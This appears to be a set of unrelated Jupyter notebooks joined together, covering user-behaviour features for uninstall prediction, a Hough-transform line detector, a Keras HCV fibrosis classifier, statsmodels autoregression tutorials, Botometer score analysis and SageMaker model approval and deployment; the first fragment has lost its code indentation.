vidstarted = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/VideoStarted.csv')
vidstarted['Date'] = pd.to_datetime(vidstarted['Date'].apply(lambda x:inttostr(x)))
genre_dict = {genre:np.zeros(len(userids)) for genre in vidstarted.Genre.unique()}
category_dict = {cat:np.zeros(len(userids)) for cat in vidstarted.Category.unique()}
program_type_dict = {ptype:np.zeros(len(userids)) for ptype in vidstarted.ProgramType.unique()}
vidstart_days_list=[]
watches_rep_vid_list = []
for idx,uid in enumerate(tqdm(userids)):
temp = vidstarted.loc[vidstarted.UserId==uid]
for genre in temp.Genre.tolist():genre_dict[genre][idx]+=1;
for cat in temp.Category.tolist():category_dict[cat][idx]+=1;
for ptype in temp.ProgramType.tolist():program_type_dict[ptype][idx]+=1;
vidstart_days_list.append((temp.Date.max()-temp.Date.min()).days)
    if len(temp.VideoId.value_counts().values) >= 2:
        rvf = temp.VideoId.value_counts().values[0] + temp.VideoId.value_counts().values[1]
elif len(temp.VideoId.value_counts().values)==1:
rvf = temp.VideoId.value_counts().values[0]
else: rvf=0
watches_rep_vid_list.append(rvf)
temp = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/VideoStarted.csv')
temp = temp[temp.UserId.isin(userids)]
temp.shape
```
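As the description above notes, the active-day span is used later to derive a per-day watch rate. A minimal sketch of that normalization with illustrative values (not the notebook's data), including a guard for users whose span rounds to zero days:

```python
import pandas as pd

# Illustrative watch counts and active-day spans per user
watch_counts = pd.Series([30, 5, 12])
active_days = pd.Series([10, 0, 4])  # 0 days => user active on a single day

# Treat a 0-day span as 1 day to avoid division by zero
videos_per_day = watch_counts / active_days.clip(lower=1)
print(videos_per_day.tolist())
```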
### Cell Description
Below cell merges the three dictionaries (genre, category and program type) into a single dictionary. Keys of these dictionaries will be used as features in the final dataframe.
```
movie_det_dict = {**genre_dict, **category_dict, **program_type_dict}
```
### Cell Description
Below cell stores the number of times a user has watched video details.
```
viddetails = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/VideoDetails.csv')
viddetails['Date'] = pd.to_datetime(viddetails['Date'].apply(lambda x:inttostr(x)))
temp = viddetails.loc[viddetails.UserId.isin(userids)]
cnt_series = temp.UserId.value_counts()
viewed_vid_cnt = [cnt_series.loc[uid] if uid in cnt_series.index else 0 for uid in tqdm(userids) ]
#viddet_days_list = [(viddetails.loc[viddetails.UserId.isin(list(uid))]['Date'].max()-viddetails.loc[viddetails.UserId.isin(list(uid))]['Date'].max()).days for uid in tqdm(userids)]
```
### Cell Description
Below cell creates empty data frame **final_df** and stores all the features generated till now in the dataframe.
```
final_df = pd.DataFrame(data=movie_det_dict)
final_df['launched_days'] = pd.Series(launch_days_list)
final_df['installed_times'] = pd.Series(install_list)
final_df['reg_status'] = pd.Series(status_list)
final_df['utm_visited_times'] = pd.Series(utm_list)
final_df['watched_days'] = pd.Series(vidstart_days_list)
final_df['vid_rep_count'] = pd.Series(watches_rep_vid_list)
final_df['viddet_view_cnt'] = pd.Series(viewed_vid_cnt)
final_df['country'] = pd.Series(country_list)
final_df.index = userids
final_df.head()
```
### Cell Description
Below cell creates dummy variables for all the categorical features.
```
final_df = pd.get_dummies(final_df);
final_df.shape
```
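On a toy frame, `pd.get_dummies` expands each categorical column into one 0/1 indicator column per category while leaving numeric columns untouched:

```python
import pandas as pd

# Toy frame with one categorical and one numeric column
toy = pd.DataFrame({"country": ["A", "B", "A"], "watched_days": [3, 7, 1]})
dummies = pd.get_dummies(toy)
print(dummies.columns.tolist())  # numeric column kept, country expanded
```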
### Save the dataframe in csv file
```
final_df.to_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/final_df.csv')
```
### Cell Description
Below cell creates and stores a dataframe containing each user's latest uninstall entry, discarding any earlier uninstall records.
```
uninstall_unique = pd.DataFrame()
uninstall = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/AppUninstalled.csv')
uninstall['Date'] = pd.to_datetime(uninstall['Date'].apply(lambda x:inttostr(x)))
for uid in tqdm(userids):
temp = uninstall.loc[uninstall.UserId==uid]
temp = temp[temp.Date==temp.Date.max()]
uninstall_unique = pd.concat([uninstall_unique,temp])
uninstall_unique.to_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/uninstall_unique.csv')
import matplotlib.pyplot as plt
%matplotlib inline
temp.VideoId.value_counts().plot(kind='hist',bins=2000)
plt.xlim(0,1000)
```
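The dedup loop above (keep only each user's latest uninstall) can also be written without a Python loop, e.g. with a sort followed by `drop_duplicates`. A sketch on toy data:

```python
import pandas as pd

# Toy uninstall log: u1 uninstalled twice, u2 once
uninstall = pd.DataFrame({
    "UserId": ["u1", "u1", "u2"],
    "Date": pd.to_datetime(["2020-01-01", "2020-03-01", "2020-02-01"]),
})

# Sort by date so the last row per user is that user's latest uninstall
uninstall_unique = (
    uninstall.sort_values("Date").drop_duplicates(subset="UserId", keep="last")
)
print(uninstall_unique.set_index("UserId")["Date"].to_dict())
```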
|
github_jupyter
|
```
import os
import cv2
import numpy as np
#import layers
import matplotlib.pyplot as plt
# credits to https://towardsdatascience.com/lines-detection-with-hough-transform-84020b3b1549
import matplotlib.lines as mlines
# i.e. a, b == m, c (slope and intercept)
def line_detection_non_vectorized(image, edge_image, num_rhos=100, num_thetas=100, t_count=220):
edge_height, edge_width = edge_image.shape[:2]
edge_height_half, edge_width_half = edge_height / 2, edge_width / 2
#
d = np.sqrt(np.square(edge_height) + np.square(edge_width))
dtheta = 180 / num_thetas
drho = (2 * d) / num_rhos
#
thetas = np.arange(0, 180, step=dtheta)
rhos = np.arange(-d, d, step=drho)
#
cos_thetas = np.cos(np.deg2rad(thetas))
sin_thetas = np.sin(np.deg2rad(thetas))
#
  accumulator = np.zeros((len(rhos), len(thetas)))
#
figure = plt.figure(figsize=(12, 12))
subplot1 = figure.add_subplot(1, 4, 1)
subplot1.imshow(image, cmap="gray")
subplot2 = figure.add_subplot(1, 4, 2)
subplot2.imshow(edge_image, cmap="gray")
subplot3 = figure.add_subplot(1, 4, 3)
subplot3.set_facecolor((0, 0, 0))
subplot4 = figure.add_subplot(1, 4, 4)
subplot4.imshow(image, cmap="gray")
#
for y in range(edge_height):
for x in range(edge_width):
if edge_image[y][x] != 0:
edge_point = [y - edge_height_half, x - edge_width_half]
ys, xs = [], []
for theta_idx in range(len(thetas)):
rho = (edge_point[1] * cos_thetas[theta_idx]) + (edge_point[0] * sin_thetas[theta_idx])
theta = thetas[theta_idx]
rho_idx = np.argmin(np.abs(rhos - rho))
accumulator[rho_idx][theta_idx] += 1
ys.append(rho)
xs.append(theta)
subplot3.plot(xs, ys, color="white", alpha=0.05)
line_results = list()
for y in range(accumulator.shape[0]):
for x in range(accumulator.shape[1]):
if accumulator[y][x] > t_count:
rho = rhos[y]
theta = thetas[x]
#print(theta)
a = np.cos(np.deg2rad(theta))
b = np.sin(np.deg2rad(theta))
x0 = (a * rho) + edge_width_half
#print(x0)
y0 = (b * rho) + edge_height_half
#print(y0)
x1 = int(x0 + 1000 * (-b))
y1 = int(y0 + 1000 * (a))
x2 = int(x0 - 1000 * (-b))
y2 = int(y0 - 1000 * (a))
#print([x1, x2])
#print([y1, y2])
#print("###")
subplot3.plot([theta], [rho], marker='o', color="yellow")
line_results.append([(x1,y1), (x2,y2)])
subplot4.add_line(mlines.Line2D([x1, x2], [y1, y2]))
subplot3.invert_yaxis()
subplot3.invert_xaxis()
subplot1.title.set_text("Original Image")
subplot2.title.set_text("Edge Image")
subplot3.title.set_text("Hough Space")
subplot4.title.set_text("Detected Lines")
plt.show()
return accumulator, rhos, thetas, line_results
img = cv2.imread(f"C:/Users/fredi/Desktop/Uni/SELS2/github/dronelab/simulation/simulated_data/1.png", cv2.IMREAD_GRAYSCALE)
#img = cv2.imread(img_dir, cv2.IMREAD_GRAYSCALE)
print(img.shape)
plt.imshow(img, "gray")
plt.show()
edge_image = cv2.Canny(img, 100, 200)
acc, rhos, thetas, line_results = line_detection_non_vectorized(img, edge_image, t_count=1000)
def merge_lines(edge_image, lines):
results = list()
agg = np.zeros(edge_image.shape)*255
edge_image = np.where(edge_image>0, 1, edge_image)
kernel = np.ones((3,3),np.float32)*255
edge_image = cv2.filter2D(edge_image,-1,kernel)
for line in lines:
tmp = np.zeros(edge_image.shape)*255
out = cv2.line(tmp, line[0], line[1], (255,255,255), thickness=1)
results.append(out * edge_image)
plt.imshow(results[-1])
agg = agg + results[-1]
plt.show()
agg = np.where(agg>255, 255, agg)
return results, agg
results, aggregated = merge_lines(edge_image, line_results)
plt.imshow(aggregated)
plt.show()
img2 = cv2.imread(f"C:/Users/fredi/Desktop/Uni/SELS2/hough2/handpicked_rails/2021-07-01-17-07-48/fps_1_frame_018.jpg")
plt.imshow(img2)
plt.show()
edge_image2 = cv2.Canny(img2, 100, 200)
acc, rhos, thetas, line_results2 = line_detection_non_vectorized(img2, edge_image2, t_count=2000)
results, aggregated = merge_lines(edge_image2, line_results2)
plt.imshow(aggregated)
plt.show()
```
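The nested pixel/theta loops above can be vectorized with NumPy broadcasting plus `np.add.at` for the accumulator votes. This is a minimal sketch of the same (rho, theta) voting scheme; note it measures rho from the image corner rather than the image center, unlike the implementation above:

```python
import numpy as np

def hough_lines(edge, num_thetas=180, threshold=60):
    """Vectorized Hough voting: each edge pixel votes for (rho, theta) pairs."""
    ys, xs = np.nonzero(edge)
    thetas = np.deg2rad(np.arange(num_thetas))
    diag = int(np.ceil(np.hypot(*edge.shape)))
    # rho = x*cos(theta) + y*sin(theta), shifted by diag so indices are non-negative
    rhos = np.round(xs[:, None] * np.cos(thetas)
                    + ys[:, None] * np.sin(thetas)).astype(int) + diag
    acc = np.zeros((2 * diag + 1, num_thetas), dtype=int)
    np.add.at(acc, (rhos.ravel(), np.tile(np.arange(num_thetas), len(xs))), 1)
    return [(r - diag, t) for r, t in np.argwhere(acc > threshold)]

# A horizontal line at y = 50 should vote heavily at rho = 50, theta = 90 degrees
edge = np.zeros((100, 100), dtype=np.uint8)
edge[50, :] = 1
print(hough_lines(edge))  # [(50, 90)]
```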
|
github_jupyter
|
# Activity 02
```
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from keras.models import Sequential
from keras.layers import Dense
from tensorflow import random
import matplotlib.pyplot as plt
import matplotlib
%matplotlib inline
# Load The dataset
X = pd.read_csv('../data/HCV_feats.csv')
y = pd.read_csv('../data/HCV_target.csv')
# Print the sizes of the dataset
print("Number of Examples in the Dataset = ", X.shape[0])
print("Number of Features for each example = ", X.shape[1])
print("Possible Output Classes = ", y['AdvancedFibrosis'].unique())
```
Set up a seed for random number generator so the result will be reproducible
Split the dataset into training set and test set with a 80-20 ratio
```
seed = 1
np.random.seed(seed)
random.set_seed(seed)
sc = StandardScaler()
X = pd.DataFrame(sc.fit_transform(X), columns=X.columns)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=seed)
# Print the information regarding dataset sizes
print(X_train.shape)
print(y_train.shape)
print(X_test.shape)
print(y_test.shape)
print ("Number of examples in training set = ", X_train.shape[0])
print ("Number of examples in test set = ", X_test.shape[0])
np.random.seed(seed)
random.set_seed(seed)
# define the keras model
classifier = Sequential()
classifier.add(Dense(units = 3, activation = 'tanh', input_dim=X_train.shape[1]))
classifier.add(Dense(units = 1, activation = 'sigmoid'))
classifier.compile(optimizer = 'sgd', loss = 'binary_crossentropy', metrics = ['accuracy'])
classifier.summary()
# train the model while storing all loss values
history=classifier.fit(X_train, y_train, batch_size = 20, epochs = 100, validation_split=0.1, shuffle=False)
matplotlib.rcParams['figure.figsize'] = (10.0, 8.0)
# plot training error and test error plots
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train loss', 'validation loss'], loc='upper right')
# print the best accuracy reached on training set and the test set
print(f"Best Accuracy on training set = {max(history.history['accuracy'])*100:.3f}%")
print(f"Best Accuracy on validation set = {max(history.history['val_accuracy'])*100:.3f}%")
test_loss, test_acc = classifier.evaluate(X_test, y_test['AdvancedFibrosis'])
print(f'The loss on the test set is {test_loss:.4f} and the accuracy is {test_acc*100:.3f}%')
# set up a seed for random number generator so the result will be reproducible
np.random.seed(seed)
random.set_seed(seed)
# define the keras model
classifier = Sequential()
classifier.add(Dense(units = 4, activation = 'tanh', input_dim = X_train.shape[1]))
classifier.add(Dense(units = 2, activation = 'tanh'))
classifier.add(Dense(units = 1, activation = 'sigmoid'))
classifier.compile(optimizer = 'sgd', loss = 'binary_crossentropy', metrics = ['accuracy'])
classifier.summary()
# train the model while storing all loss values
history=classifier.fit(X_train, y_train, batch_size = 20, epochs = 100, validation_split=0.1, shuffle=False)
# plot training error and test error plots
matplotlib.rcParams['figure.figsize'] = (10.0, 8.0)
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train loss', 'validation loss'], loc='upper right')
# print the best accuracy reached on training set and the test set
print(f"Best Accuracy on training set = {max(history.history['accuracy'])*100:.3f}%")
print(f"Best Accuracy on validation set = {max(history.history['val_accuracy'])*100:.3f}%")
test_loss, test_acc = classifier.evaluate(X_test, y_test['AdvancedFibrosis'])
print(f'The loss on the test set is {test_loss:.4f} and the accuracy is {test_acc*100:.3f}%')
```
|
github_jupyter
|
# Autoregressions
This notebook introduces autoregression modeling using the `AutoReg` model. It also covers how `ar_select_order` assists in selecting models that minimize an information criterion such as the AIC.
An autoregressive model has dynamics given by
$$ y_t = \delta + \phi_1 y_{t-1} + \ldots + \phi_p y_{t-p} + \epsilon_t. $$
`AutoReg` also permits models with:
* Deterministic terms (`trend`)
* `n`: No deterministic term
* `c`: Constant (default)
* `ct`: Constant and time trend
* `t`: Time trend only
* Seasonal dummies (`seasonal`)
* `True` includes $s-1$ dummies where $s$ is the period of the time series (e.g., 12 for monthly)
* Custom deterministic terms (`deterministic`)
* Accepts a `DeterministicProcess`
* Exogenous variables (`exog`)
* A `DataFrame` or `array` of exogenous variables to include in the model
* Omission of selected lags (`lags`)
* If `lags` is an iterable of integers, then only these are included in the model.
The complete specification is
$$ y_t = \delta_0 + \delta_1 t + \phi_1 y_{t-1} + \ldots + \phi_p y_{t-p} + \sum_{i=1}^{s-1} \gamma_i d_i + \sum_{j=1}^{m} \kappa_j x_{t,j} + \epsilon_t. $$
where:
* $d_i$ is a seasonal dummy that is 1 if $mod(t, period) = i$. Period 0 is excluded if the model contains a constant (`c` is in `trend`).
* $t$ is a time trend ($1,2,\ldots$) that starts with 1 in the first observation.
* $x_{t,j}$ are exogenous regressors. **Note** these are time-aligned to the left-hand-side variable when defining a model.
* $\epsilon_t$ is assumed to be a white noise process.
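The estimation that `AutoReg` performs reduces to OLS on lagged values. As a warm-up, this pure-NumPy sketch regresses $y_t$ on a constant and $y_{t-1}$ for a simulated AR(1) with $\phi_1 = 0.8$ (an illustration of the idea, not `AutoReg`'s actual implementation):

```python
import numpy as np

# Simulate an AR(1): y_t = 0.8 * y_{t-1} + eps_t
rng = np.random.default_rng(0)
phi, n = 0.8, 5000
y = np.zeros(n)
for t in range(1, n):
    y[t] = phi * y[t - 1] + rng.standard_normal()

# Regress y_t on a constant and y_{t-1} -- the OLS step AutoReg performs
X = np.column_stack([np.ones(n - 1), y[:-1]])
delta_hat, phi_hat = np.linalg.lstsq(X, y[1:], rcond=None)[0]
print(round(phi_hat, 2))  # close to the true phi of 0.8
```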
This first cell imports standard packages and sets plots to appear inline.
```
%matplotlib inline
import matplotlib.pyplot as plt
import pandas as pd
import pandas_datareader as pdr
import seaborn as sns
from statsmodels.tsa.ar_model import AutoReg, ar_select_order
from statsmodels.tsa.api import acf, pacf, graphics
```
This cell sets the plotting style, registers pandas date converters for matplotlib, and sets the default figure size.
```
sns.set_style('darkgrid')
pd.plotting.register_matplotlib_converters()
# Default figure size
sns.mpl.rc('figure',figsize=(16, 6))
```
The first set of examples uses the month-over-month growth rate in U.S. Housing starts that has not been seasonally adjusted. The seasonality is evident by the regular pattern of peaks and troughs. We set the frequency for the time series to "MS" (month-start) to avoid warnings when using `AutoReg`.
```
data = pdr.get_data_fred('HOUSTNSA', '1959-01-01', '2019-06-01')
housing = data.HOUSTNSA.pct_change().dropna()
# Scale by 100 to get percentages
housing = 100 * housing.asfreq('MS')
fig, ax = plt.subplots()
ax = housing.plot(ax=ax)
```
We can start with an AR(3). While this is not a good model for this data, it demonstrates the basic use of the API.
```
mod = AutoReg(housing, 3, old_names=False)
res = mod.fit()
print(res.summary())
```
`AutoReg` supports the same covariance estimators as `OLS`. Below, we use `cov_type="HC0"`, which is White's covariance estimator. While the parameter estimates are the same, all of the quantities that depend on the standard error change.
```
res = mod.fit(cov_type="HC0")
print(res.summary())
sel = ar_select_order(housing, 13, old_names=False)
sel.ar_lags
res = sel.model.fit()
print(res.summary())
```
`plot_predict` visualizes forecasts. Here we produce a large number of forecasts which show the strong seasonality captured by the model.
```
fig = res.plot_predict(720, 840)
```
`plot_diagnostics` indicates that the model captures the key features in the data.
```
fig = plt.figure(figsize=(16,9))
fig = res.plot_diagnostics(fig=fig, lags=30)
```
## Seasonal Dummies
`AutoReg` supports seasonal dummies which are an alternative way to model seasonality. Including the dummies shortens the dynamics to only an AR(2).
```
sel = ar_select_order(housing, 13, seasonal=True, old_names=False)
sel.ar_lags
res = sel.model.fit()
print(res.summary())
```
The seasonal dummies are obvious in the forecasts, which have a non-trivial seasonal component in all periods 10 years into the future.
```
fig = res.plot_predict(720, 840)
fig = plt.figure(figsize=(16,9))
fig = res.plot_diagnostics(lags=30, fig=fig)
```
## Seasonal Dynamics
While `AutoReg` does not directly support Seasonal components since it uses OLS to estimate parameters, it is possible to capture seasonal dynamics using an over-parametrized Seasonal AR that does not impose the restrictions in the Seasonal AR.
```
yoy_housing = data.HOUSTNSA.pct_change(12).resample("MS").last().dropna()
_, ax = plt.subplots()
ax = yoy_housing.plot(ax=ax)
```
We start by selecting a model using the simple method that only chooses the maximum lag. All lower lags are automatically included. The maximum lag to check is set to 13 since this allows the model to nest a Seasonal AR that has both a short-run AR(1) component and a Seasonal AR(1) component, so that
$$ (1-\phi_s L^{12})(1-\phi_1 L)y_t = \epsilon_t $$
which becomes
$$ y_t = \phi_1 y_{t-1} + \phi_s y_{t-12} - \phi_1\phi_s y_{t-13} + \epsilon_t $$
when expanded. `AutoReg` does not enforce the structure, but can estimate the nesting model
$$ y_t = \phi_1 y_{t-1} + \phi_{12} y_{t-12} - \phi_{13} y_{t-13} + \epsilon_t. $$
We see that all 13 lags are selected.
```
sel = ar_select_order(yoy_housing, 13, old_names=False)
sel.ar_lags
```
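The lag-polynomial expansion above can be checked numerically: multiplying the coefficient vectors of $(1-\phi_1 L)$ and $(1-\phi_s L^{12})$ should leave nonzero coefficients only at lags 0, 1, 12 and 13 (the values of $\phi_1$ and $\phi_s$ below are arbitrary):

```python
import numpy as np

phi1, phis = 0.5, 0.3
p_short = np.array([1.0, -phi1])            # 1 - phi1 * L
p_seasonal = np.zeros(13)
p_seasonal[0], p_seasonal[12] = 1.0, -phis  # 1 - phis * L^12

# Polynomial multiplication = convolution of coefficient vectors
product = np.convolve(p_short, p_seasonal)  # coefficients indexed by power of L
nonzero = {lag: round(float(c), 4) for lag, c in enumerate(product) if c != 0}
print(nonzero)  # {0: 1.0, 1: -0.5, 12: -0.3, 13: 0.15}
```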
It seems unlikely that all 13 lags are required. We can set `glob=True` to search all $2^{13}$ models that include up to 13 lags.
Here we see that the first three are selected, as is the 7th, and finally the 12th and 13th are selected. This is superficially similar to the structure described above.
After fitting the model, we take a look at the diagnostic plots that indicate that this specification appears to be adequate to capture the dynamics in the data.
```
sel = ar_select_order(yoy_housing, 13, glob=True, old_names=False)
sel.ar_lags
res = sel.model.fit()
print(res.summary())
fig = plt.figure(figsize=(16,9))
fig = res.plot_diagnostics(fig=fig, lags=30)
```
We can also include seasonal dummies. These are all insignificant since the model is using year-over-year changes.
```
sel = ar_select_order(yoy_housing, 13, glob=True, seasonal=True, old_names=False)
sel.ar_lags
res = sel.model.fit()
print(res.summary())
```
## Industrial Production
We will use the industrial production index data to examine forecasting.
```
data = pdr.get_data_fred('INDPRO', '1959-01-01', '2019-06-01')
ind_prod = data.INDPRO.pct_change(12).dropna().asfreq('MS')
_, ax = plt.subplots(figsize=(16,9))
ind_prod.plot(ax=ax)
```
We will start by selecting a model using up to 13 lags. An AR(13) minimizes the BIC criterion even though many coefficients are insignificant.
```
sel = ar_select_order(ind_prod, 13, 'bic', old_names=False)
res = sel.model.fit()
print(res.summary())
```
We can also use a global search which allows longer lags to enter if needed without requiring the shorter lags. Here we see many lags dropped. The model indicates there may be some seasonality in the data.
```
sel = ar_select_order(ind_prod, 13, 'bic', glob=True, old_names=False)
sel.ar_lags
res_glob = sel.model.fit()
print(res_glob.summary())
```
`plot_predict` can be used to produce forecast plots along with confidence intervals. Here we produce forecasts starting at the last observation and continuing for 18 months.
```
ind_prod.shape
fig = res_glob.plot_predict(start=714, end=732)
```
The forecasts from the full model and the restricted model are very similar. I also include an AR(5), which has very different dynamics.
```
res_ar5 = AutoReg(ind_prod, 5, old_names=False).fit()
predictions = pd.DataFrame({"AR(5)": res_ar5.predict(start=714, end=726),
"AR(13)": res.predict(start=714, end=726),
"Restr. AR(13)": res_glob.predict(start=714, end=726)})
_, ax = plt.subplots()
ax = predictions.plot(ax=ax)
```
The diagnostics indicate the model captures most of the dynamics in the data. The ACF shows a pattern at the seasonal frequency, so a more complete seasonal model (`SARIMAX`) may be needed.
```
fig = plt.figure(figsize=(16,9))
fig = res_glob.plot_diagnostics(fig=fig, lags=30)
```
# Forecasting
Forecasts are produced using the `predict` method from a results instance. The default produces static forecasts which are one-step forecasts. Producing multi-step forecasts requires using `dynamic=True`.
In this next cell, we produce 12-step-ahead forecasts for the final 24 periods in the sample. This requires a loop.
**Note**: These are technically in-sample since the data we are forecasting was used to estimate parameters. Producing OOS forecasts requires two models. The first must exclude the OOS period. The second uses the `predict` method from the full-sample model with the parameters from the shorter sample model that excluded the OOS period.
```
import numpy as np
start = ind_prod.index[-24]
forecast_index = pd.date_range(start, freq=ind_prod.index.freq, periods=36)
cols = ['-'.join(str(val) for val in (idx.year, idx.month)) for idx in forecast_index]
forecasts = pd.DataFrame(index=forecast_index,columns=cols)
for i in range(1, 24):
fcast = res_glob.predict(start=forecast_index[i], end=forecast_index[i+12], dynamic=True)
forecasts.loc[fcast.index, cols[i]] = fcast
_, ax = plt.subplots(figsize=(16, 10))
ind_prod.iloc[-24:].plot(ax=ax, color="black", linestyle="--")
ax = forecasts.plot(ax=ax)
```
## Comparing to SARIMAX
`SARIMAX` is an implementation of a Seasonal Autoregressive Integrated Moving Average with eXogenous regressors model. It supports:
* Specification of seasonal and nonseasonal AR and MA components
* Inclusion of Exogenous variables
* Full maximum-likelihood estimation using the Kalman Filter
This model is more feature-rich than `AutoReg`. Unlike `SARIMAX`, `AutoReg` estimates parameters using OLS. This is faster, and the problem is globally convex, so there are no issues with local minima. The closed-form estimator and its performance are the key advantages of `AutoReg` over `SARIMAX` when comparing AR(P) models. `AutoReg` also supports seasonal dummies, which can be used with `SARIMAX` if the user includes them as exogenous regressors.
```
from statsmodels.tsa.api import SARIMAX
sarimax_mod = SARIMAX(ind_prod, order=((1, 5, 12, 13), 0, 0), trend='c')
sarimax_res = sarimax_mod.fit()
print(sarimax_res.summary())
sarimax_params = sarimax_res.params.iloc[:-1].copy()
sarimax_params.index = res_glob.params.index
params = pd.concat([res_glob.params, sarimax_params], axis=1, sort=False)
params.columns = ["AutoReg", "SARIMAX"]
params
```
## Custom Deterministic Processes
The `deterministic` parameter allows a custom `DeterministicProcess` to be used. This allows for more complex deterministic terms to be constructed, for example one that includes seasonal components with two periods, or, as the next example shows, one that uses a Fourier series rather than seasonal dummies.
```
from statsmodels.tsa.deterministic import DeterministicProcess
dp = DeterministicProcess(housing.index, constant=True, period=12, fourier=2)
mod = AutoReg(housing, 2, trend="n", seasonal=False, deterministic=dp)
res = mod.fit()
print(res.summary())
fig = res.plot_predict(720, 840)
```
|
github_jupyter
|
```
import os
import pandas as pd
import math
import nltk
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
%matplotlib inline
import re
from nltk.tokenize import WordPunctTokenizer
import pickle
def load_csv_as_df(file_name, sub_directories, col_name=None):
'''
Load any csv as a pandas dataframe. Provide the filename, the subdirectories, and columns to read (if desired).
'''
# sub_directories = '/Data/'
base_path = os.getcwd()
full_path = base_path + sub_directories + file_name
if col_name is not None:
return pd.read_csv(full_path, usecols=[col_name])
# print('Full Path: ', full_path)
return pd.read_csv(full_path, header=0)
def describe_bots(df, return_dfs=False, for_timeline=False):
if for_timeline:
df = df.drop_duplicates(subset='user_id', keep='last')
bot_df = df[df.user_cap >= 0.53]
human_df = df[df.user_cap < 0.4]
removed_df = df[(df['user_cap'] >= 0.4) & (df['user_cap'] <= 0.53)]
else:
bot_df = df[df.cap >= 0.53]
human_df = df[df.cap < 0.4]
removed_df = df[(df['cap'] >= 0.4) & (df['cap'] <= 0.53)]
bot_percent = len(bot_df)/len(df) * 100
human_percent = len(human_df)/len(df) * 100
removed_percent = len(removed_df)/len(df) * 100
print('There are ', len(df), 'total records')
print('There are ', len(bot_df), 'Bots in these records')
print('Percentage of total accounts that are bots = ' + str(round(bot_percent, 2)) + '%')
print('Percentage of total accounts that are humans = ' + str(round(human_percent, 2)) + '%')
print('Percentage of total accounts that were removed = ' + str(round(removed_percent, 2)) + '%')
if return_dfs:
return bot_df, human_df, removed_df
def get_top_five_percent(df):
number_of_accounts = len(df)
top5 = int(number_of_accounts * 0.05)
print("num accounts: ", number_of_accounts)
print("top5: ", top5)
top_df = df.cap.nlargest(top5)
min_cap = top_df.min()
return min_cap
master_df = load_csv_as_df('MasterIDs-4.csv', '/Data/Master-Data/')
error_df = load_csv_as_df('ErrorIDs-4.csv', '/Data/Master-Data/')
bot_df, human_df, removed_df = describe_bots(master_df, return_dfs=True)
print(len(error_df))
min_cap = get_top_five_percent(master_df)
print(min_cap)
fig, ax = plt.subplots(figsize=(8, 5))
ax.grid(False)
ax.set_title('Botometer CAP Score Distribution')
plt.hist(master_df.cap, bins=10, color='b', edgecolor='k')
plt.xlabel("CAP Score")
plt.ylabel("Number of Accounts")
plt.axvline(master_df.cap.mean(), color='y', linewidth=2.5, label='Average CAP Score')
min_cap = get_top_five_percent(master_df)
plt.axvline(x=min_cap, color='orange', linewidth=2.5, linestyle='dashed', label='95th Percentile')
plt.axvline(x=0.4, color='g', linewidth=2.5, label='Human Threshold')
plt.axvline(x=0.53, color='r', linewidth=2.5, label='Bot Threshold')
plt.legend()
plt.savefig('Botometer CAP Score Frequency.png', bbox_inches='tight')
plt.scatter(master_df.cap, master_df.bot_score)
```
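The top-5% cutoff computed by `get_top_five_percent` above is approximately the 95th percentile of the CAP scores, so it can be cross-checked with `np.quantile`. A sketch on toy scores (the two values differ slightly because of the `int()` truncation in the account count):

```python
import numpy as np
import pandas as pd

caps = pd.Series(np.linspace(0, 1, 101))  # toy CAP scores: 0.00, 0.01, ..., 1.00

# nlargest-based cutoff, as in get_top_five_percent above
top5 = int(len(caps) * 0.05)              # 5 accounts
min_cap = caps.nlargest(top5).min()

# direct percentile equivalent
q95 = np.quantile(caps, 0.95)
print(min_cap, q95)  # min_cap is 0.96, q95 is 0.95 -- close but not identical
```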
|
github_jupyter
|
# Deploy the Model
The pipeline that was executed created a Model Package version within the specified Model Package Group. Of particular note, the model was registered (i.e., the Model Package was created) with the approval status `PendingManualApproval`.
As part of SageMaker Pipelines, data scientists can register the model with approved/pending manual approval as part of the CI/CD workflow.
We can also approve the model using the SageMaker Studio UI or programmatically as shown below.
```
from botocore.exceptions import ClientError
import os
import sagemaker
import logging
import boto3
import pandas as pd
sess = sagemaker.Session()
bucket = sess.default_bucket()
role = sagemaker.get_execution_role()
region = boto3.Session().region_name
sm = boto3.Session().client(service_name="sagemaker", region_name=region)
%store -r pipeline_name
print(pipeline_name)
%%time
import time
from pprint import pprint
executions_response = sm.list_pipeline_executions(PipelineName=pipeline_name)["PipelineExecutionSummaries"]
pipeline_execution_status = executions_response[0]["PipelineExecutionStatus"]
print(pipeline_execution_status)
while pipeline_execution_status == "Executing":
try:
executions_response = sm.list_pipeline_executions(PipelineName=pipeline_name)["PipelineExecutionSummaries"]
pipeline_execution_status = executions_response[0]["PipelineExecutionStatus"]
# print('Executions for our pipeline...')
# print(pipeline_execution_status)
except Exception as e:
print("Please wait...")
time.sleep(30)
pprint(executions_response)
```
# List Pipeline Execution Steps
```
pipeline_execution_status = executions_response[0]["PipelineExecutionStatus"]
print(pipeline_execution_status)
pipeline_execution_arn = executions_response[0]["PipelineExecutionArn"]
print(pipeline_execution_arn)
from pprint import pprint
steps = sm.list_pipeline_execution_steps(PipelineExecutionArn=pipeline_execution_arn)
pprint(steps)
```
# View Registered Model
```
for execution_step in steps["PipelineExecutionSteps"]:
if execution_step["StepName"] == "RegisterModel":
model_package_arn = execution_step["Metadata"]["RegisterModel"]["Arn"]
break
print(model_package_arn)
model_package_update_response = sm.update_model_package(
ModelPackageArn=model_package_arn,
ModelApprovalStatus="Approved", # Other options are Rejected and PendingManualApproval
)
```
# View Created Model
```
for execution_step in steps["PipelineExecutionSteps"]:
if execution_step["StepName"] == "CreateModel":
model_arn = execution_step["Metadata"]["Model"]["Arn"]
break
print(model_arn)
model_name = model_arn.split("/")[-1]
print(model_name)
```
# Create Model Endpoint from Model Registry
More details here: https://docs.aws.amazon.com/sagemaker/latest/dg/model-registry-deploy.html
```
import time
timestamp = int(time.time())
model_from_registry_name = "bert-model-from-registry-{}".format(timestamp)
print("Model from registry name : {}".format(model_from_registry_name))
